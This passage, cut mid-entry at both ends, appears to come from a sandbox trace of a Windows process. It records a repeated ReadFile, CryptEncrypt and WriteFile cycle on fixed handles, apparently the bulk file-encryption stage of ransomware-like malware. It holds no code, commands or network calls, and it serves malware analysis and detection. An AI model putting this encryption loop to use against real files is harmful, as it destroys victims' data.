hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.424] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.424] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.424] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.424] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.425] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.425] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.426] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.426] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.426] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.426] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.426] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.427] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.427] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.427] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.427] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.427] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.428] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.428] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.428] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.428] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.428] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.429] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.429] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.429] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.429] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.429] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.430] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.430] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.430] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.430] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.430] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.431] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.431] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.431] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.431] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.431] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.431] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, 